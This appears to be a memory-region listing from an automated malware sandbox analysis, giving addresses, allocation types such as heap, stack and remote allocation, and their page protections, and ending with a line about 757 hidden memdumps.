page read and write
5804000
trusted library allocation
page read and write
30FF000
trusted library allocation
page read and write
61D4000
heap
page read and write
2FE0000
trusted library allocation
page read and write
61F4000
heap
page read and write
481E000
trusted library allocation
page read and write
B8AF000
stack
page read and write
1282000
heap
page read and write
705E000
stack
page read and write
3585000
trusted library allocation
page read and write
5910000
trusted library allocation
page read and write
4286000
trusted library allocation
page read and write
40E9000
trusted library allocation
page read and write
442D000
trusted library allocation
page read and write
4723000
trusted library allocation
page read and write
449D000
trusted library allocation
page read and write
43E000
remote allocation
page execute and read and write
149E000
stack
page read and write
B84E000
stack
page read and write
7760000
trusted library allocation
page execute and read and write
4751000
trusted library allocation
page read and write
43C1000
trusted library allocation
page read and write
321C000
trusted library allocation
page read and write
59A0000
trusted library allocation
page execute and read and write
1267000
heap
page read and write
3070000
heap
page read and write
7B8E000
stack
page read and write
475F000
trusted library allocation
page read and write
40DC000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
3112000
trusted library allocation
page read and write
478B000
trusted library allocation
page read and write
BD4F000
stack
page read and write
57E4000
heap
page read and write
310F000
trusted library allocation
page read and write
43D0000
trusted library allocation
page read and write
2FEE000
trusted library allocation
page read and write
1530000
heap
page read and write
136F000
stack
page read and write
585E000
trusted library allocation
page read and write
58F0000
heap
page read and write
1190000
heap
page read and write
30F0000
trusted library allocation
page read and write
3000000
trusted library allocation
page read and write
1244000
heap
page read and write
2F2A000
trusted library allocation
page read and write
4100000
trusted library allocation
page read and write
345E000
trusted library allocation
page read and write
3406000
trusted library allocation
page read and write
335F000
trusted library allocation
page read and write
5B2A000
trusted library allocation
page read and write
2EC0000
heap
page read and write
6196000
heap
page read and write
45C5000
trusted library allocation
page read and write
115E000
stack
page read and write
4061000
trusted library allocation
page read and write
44FC000
trusted library allocation
page read and write
BA2000
unkown
page readonly
15F4000
trusted library allocation
page read and write
53DD000
trusted library allocation
page read and write
14E4000
trusted library allocation
page read and write
2D96000
trusted library allocation
page read and write
80BD000
stack
page read and write
1432000
trusted library allocation
page read and write
5790000
heap
page read and write
754F000
stack
page read and write
6EDE000
stack
page read and write
2DF0000
heap
page read and write
55E0000
heap
page read and write
36AB000
trusted library allocation
page read and write
4420000
trusted library allocation
page read and write
14F0000
trusted library allocation
page read and write
63DE000
stack
page read and write
53D1000
trusted library allocation
page read and write
66DE000
stack
page read and write
53B4000
trusted library allocation
page read and write
121E000
heap
page read and write
31B0000
trusted library allocation
page read and write
1190000
heap
page read and write
3556000
trusted library allocation
page read and write
5B90000
heap
page read and write
43D000
remote allocation
page execute and read and write
2DB8000
trusted library allocation
page read and write
5B26000
trusted library allocation
page read and write
6150000
heap
page read and write
5B44000
trusted library allocation
page read and write
58C0000
trusted library section
page readonly
43B4000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
368A000
trusted library allocation
page read and write
C3CE000
stack
page read and write
7730000
trusted library allocation
page execute and read and write
2E60000
trusted library allocation
page read and write
46FD000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
BE8E000
stack
page read and write
5861000
trusted library allocation
page read and write
440E000
trusted library allocation
page read and write
14DC000
stack
page read and write
4415000
trusted library allocation
page read and write
691E000
stack
page read and write
1203000
trusted library allocation
page execute and read and write
3367000
trusted library allocation
page read and write
422000
remote allocation
page execute and read and write
1190000
heap
page read and write
358D000
trusted library allocation
page read and write
466B000
trusted library allocation
page read and write
5780000
trusted library allocation
page read and write
679E000
stack
page read and write
4487000
trusted library allocation
page read and write
4386000
trusted library allocation
page read and write
4083000
trusted library allocation
page read and write
4512000
trusted library allocation
page read and write
311B000
trusted library allocation
page read and write
2D94000
trusted library allocation
page read and write
43F000
remote allocation
page execute and read and write
6C2D000
trusted library allocation
page read and write
5F8F000
heap
page read and write
355C000
trusted library allocation
page read and write
BBAD000
stack
page read and write
4091000
trusted library allocation
page read and write
3017000
trusted library allocation
page read and write
433000
remote allocation
page execute and read and write
361D000
trusted library allocation
page read and write
34A3000
trusted library allocation
page read and write
58ED000
stack
page read and write
584B000
trusted library allocation
page read and write
4258000
trusted library allocation
page read and write
1437000
trusted library allocation
page execute and read and write
3ED9000
trusted library allocation
page read and write
4099000
trusted library allocation
page read and write
369A000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
4741000
trusted library allocation
page read and write
6C20000
trusted library allocation
page read and write
16E5000
trusted library allocation
page read and write
67E6000
heap
page read and write
467A000
trusted library allocation
page read and write
5B5D000
trusted library allocation
page read and write
2FDB000
trusted library allocation
page read and write
2BAA000
heap
page read and write
595E000
stack
page read and write
30D1000
trusted library allocation
page read and write
699E000
stack
page read and write
7850000
trusted library allocation
page execute and read and write
310B000
trusted library allocation
page read and write
3106000
trusted library allocation
page execute and read and write
3247000
trusted library allocation
page read and write
317E000
stack
page read and write
3409000
trusted library allocation
page read and write
2F8F000
stack
page read and write
41D3000
trusted library allocation
page read and write
11B7000
heap
page read and write
78EE000
stack
page read and write
31A7000
trusted library allocation
page read and write
311F000
trusted library allocation
page read and write
2D3A000
trusted library allocation
page execute and read and write
31B8000
trusted library allocation
page read and write
6180000
heap
page read and write
553D000
stack
page read and write
2FD0000
trusted library allocation
page read and write
67A0000
heap
page read and write
5833000
heap
page read and write
1180000
trusted library allocation
page read and write
150A000
trusted library allocation
page execute and read and write
2FF1000
trusted library allocation
page read and write
1252000
heap
page read and write
32E6000
trusted library allocation
page read and write
142A000
trusted library allocation
page execute and read and write
46B2000
trusted library allocation
page read and write
518C000
stack
page read and write
15F0000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
5830000
heap
page read and write
2F0B000
heap
page read and write
7BCE000
stack
page read and write
160F000
stack
page read and write
58AE000
stack
page read and write
3554000
trusted library allocation
page read and write
41C000
remote allocation
page execute and read and write
37E1000
trusted library allocation
page read and write
BDAF000
stack
page read and write
BC0C000
stack
page read and write
3622000
trusted library allocation
page read and write
3697000
trusted library allocation
page read and write
4709000
trusted library allocation
page read and write
117A000
heap
page read and write
B64D000
stack
page read and write
59C0000
heap
page read and write
3442000
trusted library allocation
page read and write
6E9F000
stack
page read and write
7750000
trusted library allocation
page read and write
443000
remote allocation
page execute and read and write
There are 757 hidden memdumps, click here to show them.